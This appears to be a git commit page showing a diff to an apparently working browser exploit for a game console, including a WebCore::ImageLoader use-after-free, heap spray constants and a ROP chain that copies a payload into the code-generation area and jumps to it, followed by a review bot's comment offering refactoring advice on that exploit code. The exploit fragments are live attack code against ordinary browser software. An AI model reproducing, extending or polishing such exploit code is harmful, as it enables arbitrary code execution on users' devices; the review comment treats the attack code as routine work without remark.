
better rate

pull/2/head
Winbagility 3 years ago
parent
commit
4dafe1641a
2 changed files with 5 additions and 8 deletions
  1. +1
    -5
      index.html
  2. +4
    -3
      payload/exploit_WORKING.html

+ 1
- 5
index.html View File

@@ -5,11 +5,7 @@
<div class="align">
<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
<a href="payload/exploit_WORKING.html"><h1>Exploit WORKING</h1></a><br/>
<a href="payload/exploit.html"><h1>Exploit DEV</h1></a><br/>
<br/>
<br/>
<br/>
<br/>
<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
</div>

+ 4
- 3
payload/exploit_WORKING.html View File

@@ -17,6 +17,7 @@ function UaF(a)
var sprayCount = 0x1900;
var _4K = 0x1000;
var _16K = 0x4000;
var _32K = 0x8000;
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
a.type="radio";
@@ -196,7 +197,7 @@ function UaF(a)
ropgen_switchto_core1();
//copy to payload to codegen
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _32K)
//prepare payload argument
payload_srcaddr = payloadAdress;
@@ -208,7 +209,7 @@ function UaF(a)
//Setup the code-loading ROP-chain which can be used by the loader-payload, since the above one isn't usable after execution due to being corrupted.
ropchain_appendu32(0x0);
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _32K)
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
}
@@ -229,7 +230,7 @@ function UaF(a)
);
}
alert("search");
//alert("wait...");
//Use the new WebCore::ImageLoader & pivot !
return 0;
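Review bot: The copy length passed to `ropgen_copycodebin_to_codegen` is hard-coded at two separate call sites (the `@@ -196` and `@@ -208` hunks), and they have to be edited together whenever the size changes, as this commit shows. A single named value declared next to the new `var _32K = 0x8000;`, for example `var PAYLOAD_COPY_SIZE = _32K; // bytes copied from payloadAdress to codegenAddress`, would keep them in step and give the commit title "better rate" a place to explain why the length doubled. Both calls also lack a terminating semicolon and rely on ASI, unlike the statements around them. The `+`/`-` markers are lost on this page, so reading the `_32K` lines as the new side is inferred from the per-file counts and the added declaration; in the last hunk, whichever of `alert("search");` and `//alert("wait...");` is new, the commented-out call should be deleted rather than kept. `UaF` starts and ends outside every hunk shown.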

